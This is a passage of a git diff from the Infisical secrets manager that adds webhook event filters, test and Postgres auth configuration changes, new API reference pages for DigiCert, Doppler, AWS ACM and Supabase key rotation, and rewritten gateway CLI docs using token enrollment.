{ const { url } = decryptWebhookDetails(w, (value) => secretManagerDecryptor({ cipherTextBlob: value }).toString()); return { - ...w, + ...withEventsFilter(w), url }; }); diff --git a/backend/src/services/webhook/webhook-types.ts b/backend/src/services/webhook/webhook-types.ts index 7de8473c9ce..16ccdc44e79 100644 --- a/backend/src/services/webhook/webhook-types.ts +++ b/backend/src/services/webhook/webhook-types.ts @@ -8,11 +8,13 @@ export type TCreateWebhookDTO = { webhookUrl: string; webhookSecretKey?: string; type: string; + eventsFilter?: { eventName: TSubscribableWebhookEvent }[]; } & TProjectPermission; export type TUpdateWebhookDTO = { id: string; isDisabled?: boolean; + eventsFilter?: { eventName: TSubscribableWebhookEvent }[]; } & Omit; export type TTestWebhookDTO = { @@ -36,11 +38,14 @@ export enum WebhookType { export enum WebhookEvents { SecretModified = "secrets.modified", - SecretReminderExpired = "secrets.reminder-expired", SecretRotationFailed = "secrets.rotation-failed", TestEvent = "test" } +export const SUBSCRIBABLE_WEBHOOK_EVENTS = [WebhookEvents.SecretModified, WebhookEvents.SecretRotationFailed] as const; + +export type TSubscribableWebhookEvent = (typeof SUBSCRIBABLE_WEBHOOK_EVENTS)[number]; + type TWebhookSecretModifiedEventPayload = { type: WebhookEvents.SecretModified; payload: { @@ -54,36 +59,33 @@ type TWebhookSecretModifiedEventPayload = { }; }; -type TWebhookSecretReminderEventPayload = { - type: WebhookEvents.SecretReminderExpired; +type TWebhookSecretRotationFailedEventPayload = { + type: WebhookEvents.SecretRotationFailed; + payload: { + rotationName?: string; projectName?: string; projectId: string; environment: string; secretPath?: string; + triggeredManually?: boolean; + errorMessage?: string; type?: string | null; - secretName: string; - secretId: string; - reminderNote?: string | null; }; }; -type TWebhookSecretRotationFailedEventPayload = { - type: WebhookEvents.SecretRotationFailed; - +type TWebhookTestEventPayload = { + type: WebhookEvents.TestEvent; payload: { - rotationName?: string; projectName?: string; projectId: string; environment: string; secretPath?: string; - triggeredManually?: boolean; - errorMessage?: string; type?: string | null; }; }; export type TWebhookPayloads = | TWebhookSecretModifiedEventPayload - | TWebhookSecretReminderEventPayload - | TWebhookSecretRotationFailedEventPayload; + | TWebhookSecretRotationFailedEventPayload + | TWebhookTestEventPayload; diff --git a/backend/tsconfig.json b/backend/tsconfig.json index db076a30d67..c79668ce7e0 100644 --- a/backend/tsconfig.json +++ b/backend/tsconfig.json @@ -22,6 +22,8 @@ "moduleResolution": "Node", "allowSyntheticDefaultImports": true, "skipLibCheck": true, + "incremental": true, + "tsBuildInfoFile": "./.cache/tsconfig.tsbuildinfo", "baseUrl": ".", "paths": { "@app/*": ["./src/*"], diff --git a/backend/upgrade-path.yaml b/backend/upgrade-path.yaml deleted file mode 100644 index 4ccb7e7752a..00000000000 --- a/backend/upgrade-path.yaml +++ /dev/null @@ -1,26 +0,0 @@ -# Upgrade Path Configuration File -# -# This file defines breaking changes and database migration information for Infisical versions. -# Used by the upgrade path tool to help users understand what changes are required between versions. -# -# Expected format: -# versions: -# "version_key": # Can be "v1.2.3", "1.2.3", or "infisical/v1.2.3-postgres" -# breaking_changes: # Optional: list of breaking changes for this version -# - title: "Short descriptive title" -# description: "Detailed description of what changed" -# action: "Specific steps users need to take" -# db_schema_changes: "Optional: Description of database changes and migration details" -# notes: "Optional: Additional notes or important information about this version" -# -# Example: -# versions: -# "v1.2.3": -# breaking_changes: -# - title: "API Endpoint Changes" -# description: "Authentication endpoints have been restructured" -# action: "Update all API calls to use new /auth/v2/ endpoints" -# db_schema_changes: "Major schema restructuring with table reorganization. Extended migration time: 3 minutes." -# notes: "Critical update requiring maintenance window. Test thoroughly before production deployment." - -versions: \ No newline at end of file diff --git a/backend/vitest.e2e.config.mts b/backend/vitest.e2e.config.mts index c9f7a8e1c04..569a02b1f74 100644 --- a/backend/vitest.e2e.config.mts +++ b/backend/vitest.e2e.config.mts @@ -13,12 +13,12 @@ export default defineConfig({ }, environment: "./e2e-test/vitest-environment-knex.ts", include: ["./e2e-test/**/*.spec.ts"], - pool: "threads", + pool: "forks", poolOptions: { - threads: { - minThreads: 1, - maxThreads: 1, - singleThread: true + forks: { + singleFork: true, + minForks: 1, + maxForks: 1 } }, fileParallelism: false, diff --git a/docker-compose.e2e-dbs.yml b/docker-compose.e2e-dbs.yml index 41f542207e7..2406cdfa3bf 100644 --- a/docker-compose.e2e-dbs.yml +++ b/docker-compose.e2e-dbs.yml @@ -131,12 +131,15 @@ services: image: postgres:10.12 platform: linux/amd64 container_name: postgres-10.12 + command: ["postgres", "-c", "password_encryption=scram-sha-256"] ports: - "5435:5432" environment: - POSTGRES_DB=postgres-test - POSTGRES_USER=postgres-test - POSTGRES_PASSWORD=postgres-test + - POSTGRES_HOST_AUTH_METHOD=scram-sha-256 + - POSTGRES_INITDB_ARGS=--auth-host=scram-sha-256 --auth-local=scram-sha-256 volumes: - postgres-data-10.12:/var/lib/postgresql/data restart: unless-stopped diff --git a/docs/api-reference/endpoints/app-connections/digicert/available.mdx b/docs/api-reference/endpoints/app-connections/digicert/available.mdx new file mode 100644 index 00000000000..0a5b28f4c1f --- /dev/null +++ b/docs/api-reference/endpoints/app-connections/digicert/available.mdx @@ -0,0 +1,4 @@ +--- +title: "Available" +openapi: "GET /api/v1/app-connections/digicert/available" +--- diff --git a/docs/api-reference/endpoints/app-connections/digicert/create.mdx b/docs/api-reference/endpoints/app-connections/digicert/create.mdx new file mode 100644 index 00000000000..36f46586020 --- /dev/null +++ b/docs/api-reference/endpoints/app-connections/digicert/create.mdx @@ -0,0 +1,8 @@ +--- +title: "Create" +openapi: "POST /api/v1/app-connections/digicert" +--- + + + Check out the configuration docs for [DigiCert Connections](/integrations/app-connections/digicert) to learn how to obtain the required credentials. + diff --git a/docs/api-reference/endpoints/app-connections/digicert/delete.mdx b/docs/api-reference/endpoints/app-connections/digicert/delete.mdx new file mode 100644 index 00000000000..2ab9f883826 --- /dev/null +++ b/docs/api-reference/endpoints/app-connections/digicert/delete.mdx @@ -0,0 +1,4 @@ +--- +title: "Delete" +openapi: "DELETE /api/v1/app-connections/digicert/{connectionId}" +--- diff --git a/docs/api-reference/endpoints/app-connections/digicert/get-by-id.mdx b/docs/api-reference/endpoints/app-connections/digicert/get-by-id.mdx new file mode 100644 index 00000000000..650210110f0 --- /dev/null +++ b/docs/api-reference/endpoints/app-connections/digicert/get-by-id.mdx @@ -0,0 +1,4 @@ +--- +title: "Get by ID" +openapi: "GET /api/v1/app-connections/digicert/{connectionId}" +--- diff --git a/docs/api-reference/endpoints/app-connections/digicert/get-by-name.mdx b/docs/api-reference/endpoints/app-connections/digicert/get-by-name.mdx new file mode 100644 index 00000000000..5e0371fbb7e --- /dev/null +++ b/docs/api-reference/endpoints/app-connections/digicert/get-by-name.mdx @@ -0,0 +1,4 @@ +--- +title: "Get by Name" +openapi: "GET /api/v1/app-connections/digicert/connection-name/{connectionName}" +--- diff --git a/docs/api-reference/endpoints/app-connections/digicert/list.mdx b/docs/api-reference/endpoints/app-connections/digicert/list.mdx new file mode 100644 index 00000000000..de2e45df013 --- /dev/null +++ b/docs/api-reference/endpoints/app-connections/digicert/list.mdx @@ -0,0 +1,4 @@ +--- +title: "List" +openapi: "GET /api/v1/app-connections/digicert" +--- diff --git a/docs/api-reference/endpoints/app-connections/digicert/update.mdx b/docs/api-reference/endpoints/app-connections/digicert/update.mdx new file mode 100644 index 00000000000..7152b512f94 --- /dev/null +++ b/docs/api-reference/endpoints/app-connections/digicert/update.mdx @@ -0,0 +1,8 @@ +--- +title: "Update" +openapi: "PATCH /api/v1/app-connections/digicert/{connectionId}" +--- + + + Check out the configuration docs for [DigiCert Connections](/integrations/app-connections/digicert) to learn how to obtain the required credentials. + diff --git a/docs/api-reference/endpoints/app-connections/doppler/available.mdx b/docs/api-reference/endpoints/app-connections/doppler/available.mdx new file mode 100644 index 00000000000..90aec1ff751 --- /dev/null +++ b/docs/api-reference/endpoints/app-connections/doppler/available.mdx @@ -0,0 +1,4 @@ +--- +title: "Available" +openapi: "GET /api/v1/app-connections/doppler/available" +--- diff --git a/docs/api-reference/endpoints/app-connections/doppler/create.mdx b/docs/api-reference/endpoints/app-connections/doppler/create.mdx new file mode 100644 index 00000000000..aa558b337af --- /dev/null +++ b/docs/api-reference/endpoints/app-connections/doppler/create.mdx @@ -0,0 +1,9 @@ +--- +title: "Create" +openapi: "POST /api/v1/app-connections/doppler" +--- + + + Check out the configuration docs for [Doppler Connections](/integrations/app-connections/doppler) to learn how to obtain + the required credentials. + diff --git a/docs/api-reference/endpoints/app-connections/doppler/delete.mdx b/docs/api-reference/endpoints/app-connections/doppler/delete.mdx new file mode 100644 index 00000000000..2fb8da4786b --- /dev/null +++ b/docs/api-reference/endpoints/app-connections/doppler/delete.mdx @@ -0,0 +1,4 @@ +--- +title: "Delete" +openapi: "DELETE /api/v1/app-connections/doppler/{connectionId}" +--- diff --git a/docs/api-reference/endpoints/app-connections/doppler/get-by-id.mdx b/docs/api-reference/endpoints/app-connections/doppler/get-by-id.mdx new file mode 100644 index 00000000000..1f2f140aa89 --- /dev/null +++ b/docs/api-reference/endpoints/app-connections/doppler/get-by-id.mdx @@ -0,0 +1,4 @@ +--- +title: "Get by ID" +openapi: "GET /api/v1/app-connections/doppler/{connectionId}" +--- diff --git a/docs/api-reference/endpoints/app-connections/doppler/get-by-name.mdx b/docs/api-reference/endpoints/app-connections/doppler/get-by-name.mdx new file mode 100644 index 00000000000..a613966c9e5 --- /dev/null +++ b/docs/api-reference/endpoints/app-connections/doppler/get-by-name.mdx @@ -0,0 +1,4 @@ +--- +title: "Get by Name" +openapi: "GET /api/v1/app-connections/doppler/connection-name/{connectionName}" +--- diff --git a/docs/api-reference/endpoints/app-connections/doppler/list.mdx b/docs/api-reference/endpoints/app-connections/doppler/list.mdx new file mode 100644 index 00000000000..95dfcfd9dc1 --- /dev/null +++ b/docs/api-reference/endpoints/app-connections/doppler/list.mdx @@ -0,0 +1,4 @@ +--- +title: "List" +openapi: "GET /api/v1/app-connections/doppler" +--- diff --git a/docs/api-reference/endpoints/app-connections/doppler/update.mdx b/docs/api-reference/endpoints/app-connections/doppler/update.mdx new file mode 100644 index 00000000000..2155946854b --- /dev/null +++ b/docs/api-reference/endpoints/app-connections/doppler/update.mdx @@ -0,0 +1,9 @@ +--- +title: "Update" +openapi: "PATCH /api/v1/app-connections/doppler/{connectionId}" +--- + + + Check out the configuration docs for [Doppler Connections](/integrations/app-connections/doppler) to learn how to obtain + the required credentials. + diff --git a/docs/api-reference/endpoints/certificate-authorities/aws-acm-public-ca/create.mdx b/docs/api-reference/endpoints/certificate-authorities/aws-acm-public-ca/create.mdx new file mode 100644 index 00000000000..fcdc9d688eb --- /dev/null +++ b/docs/api-reference/endpoints/certificate-authorities/aws-acm-public-ca/create.mdx @@ -0,0 +1,4 @@ +--- +title: "Create" +openapi: "POST /api/v1/cert-manager/ca/aws-acm-public-ca" +--- diff --git a/docs/api-reference/endpoints/certificate-authorities/aws-acm-public-ca/delete.mdx b/docs/api-reference/endpoints/certificate-authorities/aws-acm-public-ca/delete.mdx new file mode 100644 index 00000000000..20ac30310d9 --- /dev/null +++ b/docs/api-reference/endpoints/certificate-authorities/aws-acm-public-ca/delete.mdx @@ -0,0 +1,4 @@ +--- +title: "Delete" +openapi: "DELETE /api/v1/cert-manager/ca/aws-acm-public-ca/{id}" +--- diff --git a/docs/api-reference/endpoints/certificate-authorities/aws-acm-public-ca/list.mdx b/docs/api-reference/endpoints/certificate-authorities/aws-acm-public-ca/list.mdx new file mode 100644 index 00000000000..296343acf23 --- /dev/null +++ b/docs/api-reference/endpoints/certificate-authorities/aws-acm-public-ca/list.mdx @@ -0,0 +1,4 @@ +--- +title: "List" +openapi: "GET /api/v1/cert-manager/ca/aws-acm-public-ca" +--- diff --git a/docs/api-reference/endpoints/certificate-authorities/aws-acm-public-ca/read.mdx b/docs/api-reference/endpoints/certificate-authorities/aws-acm-public-ca/read.mdx new file mode 100644 index 00000000000..1080ee62ede --- /dev/null +++ b/docs/api-reference/endpoints/certificate-authorities/aws-acm-public-ca/read.mdx @@ -0,0 +1,4 @@ +--- +title: "Read" +openapi: "GET /api/v1/cert-manager/ca/aws-acm-public-ca/{id}" +--- diff --git a/docs/api-reference/endpoints/certificate-authorities/aws-acm-public-ca/update.mdx b/docs/api-reference/endpoints/certificate-authorities/aws-acm-public-ca/update.mdx new file mode 100644 index 00000000000..ac77c3d006d --- /dev/null +++ b/docs/api-reference/endpoints/certificate-authorities/aws-acm-public-ca/update.mdx @@ -0,0 +1,4 @@ +--- +title: "Update" +openapi: "PATCH /api/v1/cert-manager/ca/aws-acm-public-ca/{id}" +--- diff --git a/docs/api-reference/endpoints/certificate-authorities/digicert/create.mdx b/docs/api-reference/endpoints/certificate-authorities/digicert/create.mdx new file mode 100644 index 00000000000..cc63ba8d679 --- /dev/null +++ b/docs/api-reference/endpoints/certificate-authorities/digicert/create.mdx @@ -0,0 +1,4 @@ +--- +title: "Create" +openapi: "POST /api/v1/pki/ca/digicert" +--- diff --git a/docs/api-reference/endpoints/certificate-authorities/digicert/delete.mdx b/docs/api-reference/endpoints/certificate-authorities/digicert/delete.mdx new file mode 100644 index 00000000000..cfd9d068088 --- /dev/null +++ b/docs/api-reference/endpoints/certificate-authorities/digicert/delete.mdx @@ -0,0 +1,4 @@ +--- +title: "Delete" +openapi: "DELETE /api/v1/pki/ca/digicert/{id}" +--- diff --git a/docs/api-reference/endpoints/certificate-authorities/digicert/list.mdx b/docs/api-reference/endpoints/certificate-authorities/digicert/list.mdx new file mode 100644 index 00000000000..80389e5d60e --- /dev/null +++ b/docs/api-reference/endpoints/certificate-authorities/digicert/list.mdx @@ -0,0 +1,4 @@ +--- +title: "List" +openapi: "GET /api/v1/pki/ca/digicert" +--- diff --git a/docs/api-reference/endpoints/certificate-authorities/digicert/read.mdx b/docs/api-reference/endpoints/certificate-authorities/digicert/read.mdx new file mode 100644 index 00000000000..a085654801d --- /dev/null +++ b/docs/api-reference/endpoints/certificate-authorities/digicert/read.mdx @@ -0,0 +1,4 @@ +--- +title: "Read" +openapi: "GET /api/v1/pki/ca/digicert/{id}" +--- diff --git a/docs/api-reference/endpoints/certificate-authorities/digicert/update.mdx b/docs/api-reference/endpoints/certificate-authorities/digicert/update.mdx new file mode 100644 index 00000000000..88e082c39c1 --- /dev/null +++ b/docs/api-reference/endpoints/certificate-authorities/digicert/update.mdx @@ -0,0 +1,4 @@ +--- +title: "Update" +openapi: "PATCH /api/v1/pki/ca/digicert/{id}" +--- diff --git a/docs/api-reference/endpoints/external-migrations/doppler/create-config.mdx b/docs/api-reference/endpoints/external-migrations/doppler/create-config.mdx new file mode 100644 index 00000000000..40c7291f801 --- /dev/null +++ b/docs/api-reference/endpoints/external-migrations/doppler/create-config.mdx @@ -0,0 +1,8 @@ +--- +title: "Create Config" +openapi: "POST /api/v3/external-migrations/doppler/configs" +--- + + + Check out the [Doppler migration guide](/documentation/platform/external-migrations/doppler) to learn how to migrate your secrets from Doppler to Infisical. + diff --git a/docs/api-reference/endpoints/external-migrations/doppler/delete-config.mdx b/docs/api-reference/endpoints/external-migrations/doppler/delete-config.mdx new file mode 100644 index 00000000000..432e0340d7b --- /dev/null +++ b/docs/api-reference/endpoints/external-migrations/doppler/delete-config.mdx @@ -0,0 +1,8 @@ +--- +title: "Delete Config" +openapi: "DELETE /api/v3/external-migrations/doppler/configs/{id}" +--- + + + Check out the [Doppler migration guide](/documentation/platform/external-migrations/doppler) to learn how to migrate your secrets from Doppler to Infisical. + diff --git a/docs/api-reference/endpoints/external-migrations/doppler/get-configs.mdx b/docs/api-reference/endpoints/external-migrations/doppler/get-configs.mdx new file mode 100644 index 00000000000..61b82fc60d6 --- /dev/null +++ b/docs/api-reference/endpoints/external-migrations/doppler/get-configs.mdx @@ -0,0 +1,8 @@ +--- +title: "Get Configs" +openapi: "GET /api/v3/external-migrations/doppler/configs" +--- + + + Check out the [Doppler migration guide](/documentation/platform/external-migrations/doppler) to learn how to migrate your secrets from Doppler to Infisical. + diff --git a/docs/api-reference/endpoints/external-migrations/doppler/get-environments.mdx b/docs/api-reference/endpoints/external-migrations/doppler/get-environments.mdx new file mode 100644 index 00000000000..0ff1c8219b3 --- /dev/null +++ b/docs/api-reference/endpoints/external-migrations/doppler/get-environments.mdx @@ -0,0 +1,8 @@ +--- +title: "Get Environments" +openapi: "GET /api/v3/external-migrations/doppler/environments" +--- + + + Check out the [Doppler migration guide](/documentation/platform/external-migrations/doppler) to learn how to migrate your secrets from Doppler to Infisical. + diff --git a/docs/api-reference/endpoints/external-migrations/doppler/get-projects.mdx b/docs/api-reference/endpoints/external-migrations/doppler/get-projects.mdx new file mode 100644 index 00000000000..36e8e982f83 --- /dev/null +++ b/docs/api-reference/endpoints/external-migrations/doppler/get-projects.mdx @@ -0,0 +1,8 @@ +--- +title: "Get Projects" +openapi: "GET /api/v3/external-migrations/doppler/projects" +--- + + + Check out the [Doppler migration guide](/documentation/platform/external-migrations/doppler) to learn how to migrate your secrets from Doppler to Infisical. + diff --git a/docs/api-reference/endpoints/external-migrations/doppler/import-secrets.mdx b/docs/api-reference/endpoints/external-migrations/doppler/import-secrets.mdx new file mode 100644 index 00000000000..80420124e5e --- /dev/null +++ b/docs/api-reference/endpoints/external-migrations/doppler/import-secrets.mdx @@ -0,0 +1,8 @@ +--- +title: "Import Secrets" +openapi: "POST /api/v3/external-migrations/doppler/import-secrets" +--- + + + Check out the [Doppler migration guide](/documentation/platform/external-migrations/doppler) to learn how to migrate your secrets from Doppler to Infisical. + diff --git a/docs/api-reference/endpoints/external-migrations/doppler/update-config.mdx b/docs/api-reference/endpoints/external-migrations/doppler/update-config.mdx new file mode 100644 index 00000000000..11cb813a754 --- /dev/null +++ b/docs/api-reference/endpoints/external-migrations/doppler/update-config.mdx @@ -0,0 +1,8 @@ +--- +title: "Update Config" +openapi: "PUT /api/v3/external-migrations/doppler/configs/{id}" +--- + + + Check out the [Doppler migration guide](/documentation/platform/external-migrations/doppler) to learn how to migrate your secrets from Doppler to Infisical. + diff --git a/docs/api-reference/endpoints/kms/keys/bulk-export-private-keys.mdx b/docs/api-reference/endpoints/kms/keys/bulk-export-private-keys.mdx new file mode 100644 index 00000000000..e6725cea20b --- /dev/null +++ b/docs/api-reference/endpoints/kms/keys/bulk-export-private-keys.mdx @@ -0,0 +1,4 @@ +--- +title: "Bulk Export Private Keys" +openapi: "POST /api/v1/kms/keys/bulk-export-private-keys" +--- diff --git a/docs/api-reference/endpoints/secret-rotations/supabase-api-key/create.mdx b/docs/api-reference/endpoints/secret-rotations/supabase-api-key/create.mdx new file mode 100644 index 00000000000..31b43527f4c --- /dev/null +++ b/docs/api-reference/endpoints/secret-rotations/supabase-api-key/create.mdx @@ -0,0 +1,77 @@ +--- +title: "Create" +openapi: "POST /api/v2/secret-rotations/supabase-api-key" +--- + + + Check out the configuration docs for [Supabase API Key Rotations](/documentation/platform/secret-rotation/supabase-api-key) to learn how to obtain the required parameters. + + +Creates a Supabase API Key secret rotation. Infisical will create and rotate API keys via your [Supabase connection](/integrations/app-connections/supabase) and write them to the specified secret path. + +## Request body + +| Field | Type | Required | Description | +|-------|------|----------|-------------| +| `name` | string | Yes | A unique name for the rotation (max 100 characters). | +| `projectId` | string (UUID) | Yes | The project ID. | +| `connectionId` | string (UUID) | Yes | ID of the Supabase app connection. | +| `environment` | string | Yes | Environment slug (e.g. `dev`, `prod`). | +| `secretPath` | string | Yes | Path where the generated API key secret will be stored. | +| `isAutoRotationEnabled` | boolean | No | Whether to rotate automatically on the schedule. Defaults to `true`. | +| `rotationInterval` | number | Yes | Days between rotations (minimum `1`). | +| `rotateAtUtc` | object | No | Time of day (UTC) to run rotation: `{ "hours", "minutes" }`. Defaults to `{ "hours": 0, "minutes": 0 }`. | +| `parameters.projectRef` | string | Yes | The reference ID of the Supabase project to rotate the API key for. | +| `parameters.keyType` | string | Yes | The type of the API key to rotate: `"publishable"` or `"secret"`. | +| `secretsMapping.apiKey` | string | Yes | Secret key name to store the generated API key (e.g. `SUPABASE_SECRET_API_KEY`). | +| `description` | string | No | Optional description. | + +## Sample request + +```bash +curl --request POST \ + --url https://us.infisical.com/api/v2/secret-rotations/supabase-api-key \ + --header 'Content-Type: application/json' \ + --header 'Authorization: Bearer ' \ + --data '{ + "name": "my-supabase-rotation", + "projectId": "", + "description": "Supabase API key rotation", + "connectionId": "", + "environment": "dev", + "secretPath": "/", + "isAutoRotationEnabled": true, + "rotationInterval": 30, + "rotateAtUtc": { "hours": 0, "minutes": 0 }, + "parameters": { + "projectRef": "", + "keyType": "secret" + }, + "secretsMapping": { + "apiKey": "SUPABASE_SECRET_API_KEY" + } + }' +``` + +## Sample response + +```json +{ + "secretRotation": { + "id": "", + "name": "my-supabase-rotation", + "description": "Supabase API key rotation", + "secretsMapping": { "apiKey": "SUPABASE_SECRET_API_KEY" }, + "isAutoRotationEnabled": true, + "activeIndex": 0, + "connectionId": "", + "rotationInterval": 30, + "rotateAtUtc": { "hours": 0, "minutes": 0 }, + "type": "supabase-api-key", + "parameters": { + "projectRef": "", + "keyType": "secret" + } + } +} +``` diff --git a/docs/api-reference/endpoints/secret-rotations/supabase-api-key/delete.mdx b/docs/api-reference/endpoints/secret-rotations/supabase-api-key/delete.mdx new file mode 100644 index 00000000000..9ceb12ea6af --- /dev/null +++ b/docs/api-reference/endpoints/secret-rotations/supabase-api-key/delete.mdx @@ -0,0 +1,4 @@ +--- +title: "Delete" +openapi: "DELETE /api/v2/secret-rotations/supabase-api-key/{rotationId}" +--- diff --git a/docs/api-reference/endpoints/secret-rotations/supabase-api-key/get-by-id.mdx b/docs/api-reference/endpoints/secret-rotations/supabase-api-key/get-by-id.mdx new file mode 100644 index 00000000000..87b8ae2dca7 --- /dev/null +++ b/docs/api-reference/endpoints/secret-rotations/supabase-api-key/get-by-id.mdx @@ -0,0 +1,4 @@ +--- +title: "Get by ID" +openapi: "GET /api/v2/secret-rotations/supabase-api-key/{rotationId}" +--- diff --git a/docs/api-reference/endpoints/secret-rotations/supabase-api-key/get-by-name.mdx b/docs/api-reference/endpoints/secret-rotations/supabase-api-key/get-by-name.mdx new file mode 100644 index 00000000000..99655c65022 --- /dev/null +++ b/docs/api-reference/endpoints/secret-rotations/supabase-api-key/get-by-name.mdx @@ -0,0 +1,4 @@ +--- +title: "Get by Name" +openapi: "GET /api/v2/secret-rotations/supabase-api-key/rotation-name/{rotationName}" +--- diff --git a/docs/api-reference/endpoints/secret-rotations/supabase-api-key/get-generated-credentials-by-id.mdx b/docs/api-reference/endpoints/secret-rotations/supabase-api-key/get-generated-credentials-by-id.mdx new file mode 100644 index 00000000000..375c2bd8562 --- /dev/null +++ b/docs/api-reference/endpoints/secret-rotations/supabase-api-key/get-generated-credentials-by-id.mdx @@ -0,0 +1,4 @@ +--- +title: "Get Credentials by ID" +openapi: "GET /api/v2/secret-rotations/supabase-api-key/{rotationId}/generated-credentials" +--- diff --git a/docs/api-reference/endpoints/secret-rotations/supabase-api-key/list.mdx b/docs/api-reference/endpoints/secret-rotations/supabase-api-key/list.mdx new file mode 100644 index 00000000000..9970adb0acb --- /dev/null +++ b/docs/api-reference/endpoints/secret-rotations/supabase-api-key/list.mdx @@ -0,0 +1,4 @@ +--- +title: "List" +openapi: "GET /api/v2/secret-rotations/supabase-api-key" +--- diff --git a/docs/api-reference/endpoints/secret-rotations/supabase-api-key/rotate-secrets.mdx b/docs/api-reference/endpoints/secret-rotations/supabase-api-key/rotate-secrets.mdx new file mode 100644 index 00000000000..083f0788797 --- /dev/null +++ b/docs/api-reference/endpoints/secret-rotations/supabase-api-key/rotate-secrets.mdx @@ -0,0 +1,4 @@ +--- +title: "Rotate Secrets" +openapi: "POST /api/v2/secret-rotations/supabase-api-key/{rotationId}/rotate-secrets" +--- diff --git a/docs/api-reference/endpoints/secret-rotations/supabase-api-key/update.mdx b/docs/api-reference/endpoints/secret-rotations/supabase-api-key/update.mdx new file mode 100644 index 00000000000..49d888b85fe --- /dev/null +++ b/docs/api-reference/endpoints/secret-rotations/supabase-api-key/update.mdx @@ -0,0 +1,8 @@ +--- +title: "Update" +openapi: "PATCH /api/v2/secret-rotations/supabase-api-key/{rotationId}" +--- + + + Check out the configuration docs for [Supabase API Key Rotations](/documentation/platform/secret-rotation/supabase-api-key) to learn how to obtain the required parameters. + diff --git a/docs/cli/commands/gateway.mdx b/docs/cli/commands/gateway.mdx index e7da7a74f6c..53226c024b9 100644 --- a/docs/cli/commands/gateway.mdx +++ b/docs/cli/commands/gateway.mdx @@ -4,14 +4,14 @@ description: "Run the Infisical gateway or manage its systemd service" --- - + ```bash - sudo infisical gateway start --name= --auth-method= + infisical gateway start --enroll-method=token --token= --domain= ``` - + ```bash - sudo infisical gateway systemd install --token= --domain= --name= + sudo infisical gateway systemd install --enroll-method=token --token= --domain= ``` @@ -36,9 +36,11 @@ If you are moving from Gateway v1 to Gateway v2, this is NOT a drop-in switch. G Run the Infisical gateway component within your the network where your target resources are located. The gateway establishes an SSH reverse tunnel to a relay server and provides secure access to private resources within your network. ```bash -sudo infisical gateway start --name= --auth-method= +infisical gateway start --enroll-method=token --token= --domain= ``` +The gateway name is provided as a positional argument. + By default, the gateway automatically connects to the relay with the lowest latency. To target a specific relay, use the `--target-relay-name=` flag. @@ -51,207 +53,34 @@ Once started, the gateway component will: - Automatically reconnect if the connection is lost - Provide access to private resources within your network -### Authentication - -The Gateway supports multiple authentication methods. Below are the available authentication methods, with their respective flags. - - - - The Universal Auth method is a simple and secure way to authenticate with Infisical. It requires a client ID and a client secret to authenticate with Infisical. - - - - - Your machine identity client ID. - - - Your machine identity client secret. - - - The authentication method to use. Must be `universal-auth` when using Universal Auth. - - - - - ```bash - sudo infisical gateway start --auth-method=universal-auth --client-id= --client-secret= --name= - ``` +### Flags - - - The Native Kubernetes method is used to authenticate with Infisical when running in a Kubernetes environment. It requires a service account token to authenticate with Infisical. + + + The enrollment method to use. Currently only `token` is supported. Additional authentication methods will be available in the future. - - Your machine identity ID. - - - Path to the Kubernetes service account token to use. Default: `/var/run/secrets/kubernetes.io/serviceaccount/token`. - - - The authentication method to use. Must be `kubernetes` when using Native Kubernetes. - - - - - - - ```bash - sudo infisical gateway start --auth-method=kubernetes --machine-identity-id= --name= - ``` - - - - The Native Azure method is used to authenticate with Infisical when running in an Azure environment. - - - - - Your machine identity ID. - - - The authentication method to use. Must be `azure` when using Native Azure. - - - - - - - ```bash - sudo infisical gateway start --auth-method=azure --machine-identity-id= --name= - ``` - - - - The Native GCP ID Token method is used to authenticate with Infisical when running in a GCP environment. - - - - - Your machine identity ID. - - - The authentication method to use. Must be `gcp-id-token` when using Native GCP ID Token. - - - - - - - ```bash - sudo infisical gateway start --auth-method=gcp-id-token --machine-identity-id= --name= - ``` - - - - The GCP IAM method is used to authenticate with Infisical with a GCP service account key. - - - - - Your machine identity ID. - - - Path to your GCP service account key file _(Must be in JSON format!)_ - - - The authentication method to use. Must be `gcp-iam` when using GCP IAM. - - - - - ```bash - sudo infisical gateway start --auth-method=gcp-iam --machine-identity-id= --service-account-key-file-path= --name= - ``` - - - - The AWS IAM method is used to authenticate with Infisical with an AWS IAM role while running in an AWS environment like EC2, Lambda, etc. - - - - - Your machine identity ID. - - - The authentication method to use. Must be `aws-iam` when using Native AWS IAM. + + Must be `token` when using an enrollment token. - - - - ```bash - sudo infisical gateway start --auth-method=aws-iam --machine-identity-id= --name= - ``` - - - - The OIDC Auth method is used to authenticate with Infisical via identity tokens with OIDC. - - - - - Your machine identity ID. - - - The OIDC JWT from the identity provider. - - - The authentication method to use. Must be `oidc-auth` when using OIDC Auth. - - - - - ```bash - sudo infisical gateway start --auth-method=oidc-auth --machine-identity-id= --jwt= --name= - ``` - - - - - The JWT Auth method is used to authenticate with Infisical via a JWT token. - - - - - The JWT token to use for authentication. - - - Your machine identity ID. + + The one-time enrollment token from the Infisical UI. - - The authentication method to use. Must be `jwt-auth` when using JWT Auth. + + The URL of your Infisical instance. - ```bash - sudo infisical gateway start --auth-method=jwt-auth --jwt= --machine-identity-id= --name= + infisical gateway start my-gateway --enroll-method=token --token= --domain=https://app.infisical.com ``` - - - You can use the `INFISICAL_TOKEN` environment variable to authenticate with Infisical with a raw machine identity access token. - - - - - The machine identity access token to use for authentication. - - - - - ```bash - sudo infisical gateway start --token= --name= - ``` + After enrollment, the gateway saves its credentials locally. You can safely re-run the same command to restart the gateway. It will detect the token has already been used and skip enrollment automatically. - - -### Other Flags - The name of the relay that this gateway should connect to. The relay must be running and registered before starting the gateway. @@ -259,29 +88,19 @@ The Gateway supports multiple authentication methods. Below are the available au ```bash # Example - sudo infisical gateway start --target-relay-name=my-relay --name=my-gateway --token= + infisical gateway start my-gateway --target-relay-name=my-relay --enroll-method=token --token= --domain= ``` **Note:** For Infisical Cloud users using instance relays, the relay infrastructure is already running and managed by Infisical. If using organization relays or self-hosted instance relays, you must first start a relay server. For more information on deploying relays, refer to the [Relay Deployment Guide](/documentation/platform/gateways/relay-deployment). - - The name of the gateway instance. - - ```bash - # Example - sudo infisical gateway start --name=my-gateway --token= - ``` - - - Domain of your self-hosted Infisical instance. ```bash # Example - sudo infisical gateway start --domain=https://app.your-domain.com --name= + infisical gateway start --domain=https://app.your-domain.com --enroll-method=token --token= ``` @@ -292,7 +111,7 @@ The Gateway supports multiple authentication methods. Below are the available au Install and enable the gateway as a systemd service. This command must be run with sudo on Linux. ```bash -sudo infisical gateway systemd install --token= --domain= --name= +sudo infisical gateway systemd install my-gateway --enroll-method=token --token= --domain= ``` ### Requirements @@ -304,34 +123,32 @@ sudo infisical gateway systemd install --token= --domain= --name= ### Flags - - The machine identity access token to authenticate with 